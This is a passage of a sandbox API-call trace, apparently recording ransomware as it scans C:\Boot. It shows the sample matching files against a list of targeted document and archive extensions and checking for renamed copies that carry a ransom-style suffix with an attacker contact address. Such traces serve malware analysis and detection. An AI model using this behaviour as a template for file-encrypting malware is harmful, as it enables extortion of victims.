[0059.455] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString=".jpg") returned 4 [0059.455] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString=".doc") returned 4 [0059.455] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0059.455] lstrlenW (lpString=".docx") returned 5 [0059.455] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0059.455] lstrlenW (lpString=".pdf") returned 4 [0059.455] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0059.455] lstrlenW (lpString=".xls") returned 4 [0059.456] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0059.456] lstrlenW (lpString=".xlsx") returned 5 [0059.494] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0059.495] lstrlenW (lpString=".ppt") returned 4 [0059.495] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0059.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.495] lstrlenW (lpString=".zip") returned 4 [0059.495] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0059.495] lstrlenW (lpString=".rar") returned 4 [0059.495] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0059.495] lstrlenW (lpString=".bz2") returned 4 [0059.495] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0059.495] lstrlenW (lpString=".7z") returned 3 [0059.495] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0059.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.495] lstrlenW (lpString=".dbf") returned 4 [0059.495] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0059.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.495] lstrlenW (lpString=".1cd") returned 4 [0059.495] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0059.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.495] lstrlenW (lpString=".jpg") returned 4 [0059.495] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0059.495] lstrlenW (lpString="BCD") returned 3 [0059.496] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.496] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.496] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.496] lstrlenW (lpString=".doc") returned 4 [0059.496] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".docx") returned 5 [0059.496] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0059.496] lstrlenW (lpString=".pdf") returned 4 [0059.496] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".xls") returned 4 [0059.496] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".xlsx") returned 5 [0059.496] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0059.496] lstrlenW (lpString=".ppt") returned 4 [0059.496] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.496] lstrlenW (lpString=".zip") returned 4 [0059.496] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".rar") returned 4 [0059.496] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".bz2") returned 4 [0059.496] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0059.496] lstrlenW (lpString=".7z") returned 3 [0059.496] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0059.496] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.496] lstrlenW (lpString=".dbf") returned 4 [0059.496] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.497] lstrlenW (lpString=".1cd") returned 4 [0059.497] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.497] lstrlenW (lpString=".jpg") returned 4 [0059.497] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.497] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.497] lstrlenW (lpString=".doc") returned 4 [0059.497] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".docx") returned 5 [0059.497] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0059.497] lstrlenW (lpString=".pdf") returned 4 [0059.497] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".xls") returned 4 [0059.497] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".xlsx") returned 5 [0059.497] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0059.497] lstrlenW (lpString=".ppt") returned 4 [0059.497] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.497] lstrlenW (lpString=".zip") returned 4 [0059.497] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".rar") returned 4 [0059.497] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".bz2") returned 4 [0059.497] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0059.497] lstrlenW (lpString=".7z") returned 3 [0059.497] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0059.498] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.498] lstrlenW (lpString=".dbf") returned 4 [0059.498] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0059.498] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.498] lstrlenW (lpString=".1cd") returned 4 [0059.498] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0059.498] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0059.498] lstrlenW (lpString=".jpg") returned 4 [0059.498] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0059.498] lstrcmpiW (lpString1=".LOG1", lpString2=".bat") returned 1 [0059.498] lstrlenW (lpString="BCD.LOG1") returned 8 [0059.498] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0059.498] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=0) returned 1 [0059.498] CloseHandle (hObject=0x324) returned 1 [0059.498] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString=".doc") returned 4 [0059.499] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".docx") returned 5 [0059.499] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0059.499] lstrlenW (lpString=".pdf") returned 4 [0059.499] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".xls") returned 4 [0059.499] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".xlsx") returned 5 [0059.499] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0059.499] lstrlenW (lpString=".ppt") returned 4 [0059.499] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString=".zip") returned 4 [0059.499] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".rar") returned 4 [0059.499] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".bz2") returned 4 [0059.499] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString=".7z") returned 3 [0059.499] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0059.499] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString=".dbf") returned 4 [0059.499] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString=".1cd") returned 4 [0059.499] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0059.499] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.499] lstrlenW (lpString=".jpg") returned 4 [0059.500] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.500] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.500] lstrlenW (lpString=".doc") returned 4 [0059.500] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".docx") returned 5 [0059.500] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0059.500] lstrlenW (lpString=".pdf") returned 4 [0059.500] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".xls") returned 4 [0059.500] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".xlsx") returned 5 [0059.500] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0059.500] lstrlenW (lpString=".ppt") returned 4 [0059.500] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.500] lstrlenW (lpString=".zip") returned 4 [0059.500] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".rar") returned 4 [0059.500] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".bz2") returned 4 [0059.500] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString=".7z") returned 3 [0059.500] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0059.500] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.500] lstrlenW (lpString=".dbf") returned 4 [0059.500] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0059.500] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.500] lstrlenW (lpString=".1cd") returned 4 [0059.501] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0059.501] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0059.501] lstrlenW (lpString=".jpg") returned 4 [0059.501] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0059.501] lstrcmpiW (lpString1=".LOG2", lpString2=".bat") returned 1 [0059.501] lstrlenW (lpString="BCD.LOG2") returned 8 [0059.501] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0059.501] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=0) returned 1 [0059.501] CloseHandle (hObject=0x324) returned 1 [0059.501] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.501] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.501] lstrlenW (lpString=".doc") returned 4 [0059.501] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0059.501] lstrlenW (lpString=".docx") returned 5 [0059.501] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0059.501] lstrlenW (lpString=".pdf") returned 4 [0059.501] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0059.501] lstrlenW (lpString=".xls") returned 4 [0059.502] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString=".xlsx") returned 5 [0059.502] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0059.502] lstrlenW (lpString=".ppt") returned 4 [0059.502] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString=".zip") returned 4 [0059.502] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString=".rar") returned 4 [0059.502] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString=".bz2") returned 4 [0059.502] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString=".7z") returned 3 [0059.502] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString=".dbf") returned 4 [0059.502] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString=".1cd") returned 4 [0059.502] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString=".jpg") returned 4 [0059.502] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.502] lstrlenW (lpString=".doc") returned 4 [0059.502] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0059.502] lstrlenW (lpString=".docx") returned 5 [0059.502] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0059.503] lstrlenW (lpString=".pdf") returned 4 [0059.503] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString=".xls") returned 4 [0059.503] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString=".xlsx") returned 5 [0059.503] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0059.503] lstrlenW (lpString=".ppt") returned 4 [0059.503] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.503] lstrlenW (lpString=".zip") returned 4 [0059.503] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString=".rar") returned 4 [0059.503] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString=".bz2") returned 4 [0059.503] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString=".7z") returned 3 [0059.503] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0059.503] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.503] lstrlenW (lpString=".dbf") returned 4 [0059.503] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.503] lstrlenW (lpString=".1cd") returned 4 [0059.503] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0059.503] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0059.503] lstrlenW (lpString=".jpg") returned 4 [0059.503] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0059.504] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0059.504] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0059.504] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0059.504] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=77664) returned 1 [0059.504] CloseHandle (hObject=0x324) returned 1 [0059.504] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0059.504] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.504] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.504] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.504] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.504] lstrlenW (lpString=".doc") returned 4 [0059.504] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0059.504] lstrlenW (lpString=".docx") returned 5 [0059.504] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0059.504] lstrlenW (lpString=".pdf") returned 4 [0059.505] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0059.505] lstrlenW (lpString=".xls") returned 4 [0059.505] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0059.505] lstrlenW (lpString=".xlsx") returned 5 [0059.505] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0059.505] lstrlenW (lpString=".ppt") returned 4 [0059.505] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0059.505] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.505] lstrlenW (lpString=".zip") returned 4 [0059.505] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0059.505] lstrlenW (lpString=".rar") returned 4 [0059.505] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0059.505] lstrlenW (lpString=".bz2") returned 4 [0059.505] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0059.505] lstrlenW (lpString=".7z") returned 3 [0059.505] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0059.505] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.505] lstrlenW (lpString=".dbf") returned 4 [0059.505] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0059.505] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.505] lstrlenW (lpString=".1cd") returned 4 [0059.505] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0059.505] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.505] lstrlenW (lpString=".jpg") returned 4 [0059.505] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0059.506] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.506] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.506] lstrlenW (lpString=".doc") returned 4 [0059.506] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0059.506] lstrlenW (lpString=".docx") returned 5 [0059.506] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0059.506] lstrlenW (lpString=".pdf") returned 4 [0059.506] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0059.506] lstrlenW (lpString=".xls") returned 4 [0059.506] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0059.506] lstrlenW (lpString=".xlsx") returned 5 [0059.506] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0059.506] lstrlenW (lpString=".ppt") returned 4 [0059.506] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0059.506] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.506] lstrlenW (lpString=".zip") returned 4 [0059.506] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0059.506] lstrlenW (lpString=".rar") returned 4 [0059.506] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0059.506] lstrlenW (lpString=".bz2") returned 4 [0059.506] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0059.506] lstrlenW (lpString=".7z") returned 3 [0059.506] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0059.506] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.506] lstrlenW (lpString=".dbf") returned 4 [0059.506] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0059.506] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.506] lstrlenW (lpString=".1cd") returned 4 [0059.506] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0059.507] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0059.507] lstrlenW (lpString=".jpg") returned 4 [0059.507] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0059.507] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0059.507] lstrlenW (lpString="bootspaces.dll") returned 14 [0059.507] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0059.508] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=95648) returned 1 [0059.508] CloseHandle (hObject=0x324) returned 1 [0059.508] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0059.508] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.508] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.508] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.508] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.508] lstrlenW (lpString=".doc") returned 4 [0059.508] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0059.508] lstrlenW (lpString=".docx") returned 5 [0059.508] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0059.508] lstrlenW (lpString=".pdf") returned 4 [0059.508] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0059.508] lstrlenW (lpString=".xls") returned 4 [0059.508] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0059.508] lstrlenW (lpString=".xlsx") returned 5 [0059.508] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0059.508] lstrlenW (lpString=".ppt") returned 4 [0059.508] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0059.508] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.508] lstrlenW (lpString=".zip") returned 4 [0059.509] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString=".rar") returned 4 [0059.509] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString=".bz2") returned 4 [0059.509] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0059.509] lstrlenW (lpString=".7z") returned 3 [0059.509] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0059.509] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.509] lstrlenW (lpString=".dbf") returned 4 [0059.509] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0059.509] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.509] lstrlenW (lpString=".1cd") returned 4 [0059.509] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0059.509] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.509] lstrlenW (lpString=".jpg") returned 4 [0059.509] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.509] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.509] lstrlenW (lpString=".doc") returned 4 [0059.509] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString=".docx") returned 5 [0059.509] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0059.509] lstrlenW (lpString=".pdf") returned 4 [0059.509] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString=".xls") returned 4 [0059.509] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0059.509] lstrlenW (lpString=".xlsx") returned 5 [0059.509] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0059.509] lstrlenW (lpString=".ppt") returned 4 [0059.510] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0059.510] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.510] lstrlenW (lpString=".zip") returned 4 [0059.510] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0059.510] lstrlenW (lpString=".rar") returned 4 [0059.510] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0059.510] lstrlenW (lpString=".bz2") returned 4 [0059.510] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0059.510] lstrlenW (lpString=".7z") returned 3 [0059.510] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0059.510] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.510] lstrlenW (lpString=".dbf") returned 4 [0059.510] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0059.510] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.510] lstrlenW (lpString=".1cd") returned 4 [0059.510] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0059.510] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0059.510] lstrlenW (lpString=".jpg") returned 4 [0059.510] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0059.510] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0059.510] lstrlenW (lpString="bootvhd.dll") returned 11 [0059.510] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0059.511] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=99744) returned 1 [0059.511] CloseHandle (hObject=0x324) returned 1 [0059.511] GetFileAttributesW 